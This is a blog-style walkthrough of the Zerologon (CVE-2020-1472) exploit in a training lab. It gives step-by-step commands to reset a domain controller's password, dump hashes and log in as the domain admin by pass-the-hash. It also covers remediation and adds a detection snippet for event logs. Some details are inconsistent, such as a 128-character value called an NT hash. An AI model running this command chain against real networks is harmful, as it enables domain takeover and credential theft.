CVE-2020-1472 Zerologon Vulnerability Exploitation & Remediation

Noel Varghese
5 min read · Jan 11, 2022


NOTE: This is my first vulnerability-related write-up, and I have tried to write and explain it in layman's terms. There may be knowledge gaps in between, which I am trying my hardest to cover and understand.

There’s also a Gitbooks version of the same challenge, written by me. You can go ahead and check it out!

Section 1 — Exploiting Zerologon Vulnerability (CVE-2020-1472)

About the Vulnerability

Netlogon is a service that runs on the Domain Controller. This service is responsible for authenticating user logins — effectively verifying the user is who they claim to be. As this function is one of the core functions of a Domain Controller, the Netlogon service cannot be stopped or firewalled off from networks of domain-joined computers.

  • CVSS Score — 10
  • Attack Complexity — Low
  • Privileges Required — Low
  • Vulnerability Found — July 2020

Exploitable Point

The Netlogon RPC service, used for computer and user authentication in Windows, also allows a computer to update its computer password within the domain. For several historical reasons, this service does not use standard authentication protocols to authenticate the computer. The vulnerability exists within the non-standard method used to authenticate.

Twitter thread providing a nice walkthrough — https://twitter.com/_dirkjan/status/1306280553281449985

Exploitation Walkthrough

What do you need?
  • Impacket, to capture password hashes and dump them
  • Windows 10 OS (on which the vulnerable service exists)
  • Windows 10 VM, to perform the exploit on
  • RangeForce's ZeroLogon Vulnerability Lab (Guided Mode)

First, let’s clone the impacket repository from Github
Step to install:-

git clone https://github.com/SecureAuthCorp/impacket.git

Now, let's copy the exploit too from Github <cve-2020-1472-exploit.py>

Credits to dirkjanm.

https://github.com/dirkjanm/CVE-2020-1472/blob/master/cve-2020-1472-exploit.py

Export the exploit to /impacket/examples/CVE-2020-1472/

Now, let’s switch to this directory

By now, we have identified the following details about the vulnerable service:-

NetBIOS computer name: DC
IP address: 192.168.0.4

Syntax of exploit command:-
./cve-2020-1472-exploit.py -n <NetBIOS computer name> -t <IP address>

Now to run the script and exploit

./cve-2020-1472-exploit.py -n DC -t 192.168.0.4

What does this exploit do?

It resets the Domain Controller's machine account password to an empty string (an empty password now logs the account in).

The gist: Your Domain Controller account’s password is a blank string

Next objective: dump password hashes from the Domain Controller

Components required:-
  • Domain Controller name
  • NetBIOS name
  • IP address of the vulnerable host

We make use of the secretsdump.py module from Impacket to perform this task

Password dump command syntax:-
python3 secretsdump.py -no-pass -just-dc <Domain/NETBIOS_NAME\$@IP>

(This command does not work with the simple execution command ./)

Filling in the blanks:-

python3 secretsdump.py -no-pass -just-dc CONTOSO.AZURE/DC\$@192.168.0.4

This leads to the dumping of around 60 password hashes:-

Next objective — Logging onto the account of ContosoAdmin (Domain Controller admin’s account) — using the account’s dumped hash

Scrolling through the dumped list, we find the appropriate entry:-

Logging on to the server, using the wmiexec.py module:-

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a2bd759faf686d052f5f7c8337a2ff51 CONTOSO.AZURE/ContosoAdmin@192.168.0.4

We are in!

Section 2 — Remediation from the Vulnerability

How?

  • Manually restoring the Domain Controller's machine account password, or
  • Installing the August 2020 and February 2021 Patch Tuesday updates that address it (the fix was released in two phases)
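Whichever route is taken, a practitioner will also want to know whether the Domain Controller is actually enforcing the fix and whether anyone has already attempted the password reset described above. As an added example (not part of the original write-up or of the RangeForce lab), this Python snippet triages constructed Windows event records for the indicators the August 2020 Netlogon update introduced (System events 5827 to 5831, where 5829 means a vulnerable connection was still allowed because enforcement mode is off) and for Security event 4742 computer-account changes whose subject is ANONYMOUS LOGON, the pattern the unauthenticated reset produces; the record layout and field names are simplified assumptions, not the real event schema.

```python
# Added example, not from the original write-up: triage Windows event records for
# the Zerologon indicators defenders look for after the August 2020 Netlogon update.
# The event IDs are Microsoft's; the record layout and sample events are constructed.
from collections import Counter

ANONYMOUS_LOGON_SID = "S-1-5-7"

# System-log Netlogon events introduced by the August 2020 update.
NETLOGON_EVENTS = {
    5827: "denied vulnerable secure channel connection (machine account)",
    5828: "denied vulnerable secure channel connection (trust account)",
    5829: "ALLOWED vulnerable secure channel connection: enforcement mode is off",
    5830: "allowed vulnerable connection via group policy (machine account)",
    5831: "allowed vulnerable connection via group policy (trust account)",
}

def triage(events):
    """Return (severity, description) findings; each event is a dict with
    'EventID' and a 'Fields' dict (constructed layout, not the real schema)."""
    findings = []
    for ev in events:
        eid, f = ev["EventID"], ev.get("Fields", {})
        if eid in NETLOGON_EVENTS:
            # 5829 means a vulnerable client was let in: the DC is not enforcing.
            sev = "HIGH" if eid == 5829 else "MEDIUM"
            who = f.get("MachineSamAccountName", "?")
            findings.append((sev, f"{eid}: {NETLOGON_EVENTS[eid]} from {who}"))
        elif (eid == 4742  # 'A computer account was changed'
              and f.get("SubjectUserSid") == ANONYMOUS_LOGON_SID
              and f.get("TargetUserName", "").endswith("$")):
            # A machine-account change by ANONYMOUS LOGON matches the unauthenticated
            # password reset the exploit performs against the DC account.
            findings.append(("CRITICAL", f"4742: machine account "
                             f"{f['TargetUserName']} changed by ANONYMOUS LOGON"))
    return findings

def summarize(findings):
    """Count findings per severity, e.g. {'CRITICAL': 1, 'HIGH': 1, 'MEDIUM': 1}."""
    return dict(Counter(sev for sev, _ in findings))

# Constructed sample records mirroring the lab host (NetBIOS name DC).
SAMPLE_EVENTS = [
    {"EventID": 4742, "Fields": {"SubjectUserSid": ANONYMOUS_LOGON_SID, "TargetUserName": "DC$"}},
    {"EventID": 4742, "Fields": {"SubjectUserSid": "S-1-5-21-1-2-3-1105", "TargetUserName": "WS01$"}},
    {"EventID": 5829, "Fields": {"MachineSamAccountName": "WS02$"}},
    {"EventID": 5827, "Fields": {"MachineSamAccountName": "LEGACYNAS$"}},
    {"EventID": 4624, "Fields": {}},  # unrelated logon event, ignored
]
```

Running triage(SAMPLE_EVENTS) yields one CRITICAL (the DC$ reset), one HIGH (5829) and one MEDIUM (5827) finding; the second 4742, a normal change by a domain SID, is correctly ignored.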

(Manual Password Restore) — How does it work?

As you exploit the vulnerability, the password hash is erased and replaced with a blank string in the SAM file, which is where the computer cross-checks passwords as a user logs in.

Using the same access, we save the compromised SAM hive (together with the SYSTEM and SECURITY hives) from the exploited Domain Controller, copy the files to the Kali VM, and then delete them from the Domain Controller.

Which we achieve from the following steps:-

Now exit the Windows machine (type exit) and return to the Kali machine.

The next task is to parse the SAM file obtained from the Domain Controller:-

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Why parse? To see where accounts are mapped to and to gather other information.

Recovered password hash — 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480

Now to place the final piece of the jigsaw: restoring the original password. For that, we have a customized script named reinstall_original_pw.py.

Syntax — reinstall_original_pw.py <DC_NETBIOS_NAME> <DC_IP_ADDR> <ORIG_NT_HASH>

Filling in the blanks here,

./reinstall_original_pw.py DC 192.168.0.4 89ed2eb25e25770b7dd850e797ef8c7b49cc4d793ea50f9db33fe91cde5b97c20b8aa582a3acd371618e7f7ed5ad9ee87df1d073641c6718cb63ed7409711480

Conclusion:-

This is an easy vulnerability to exploit, with low complexity, considering that we are still dependent on IT systems to perform administrative tasks. This may be disputed, but 100% security may be a myth unless drastic action is taken to respond to and patch even the slightest of issues.

Connect with me on LinkedIn — https://www.linkedin.com/in/noel--varghese

Thank you for taking the time to devour this red team blog entry.

Written by Noel Varghese

Threat Researcher at CloudSEK Security+ | eJPT | Connect with me on LinkedIn — https://www.linkedin.com/in/noel--varghese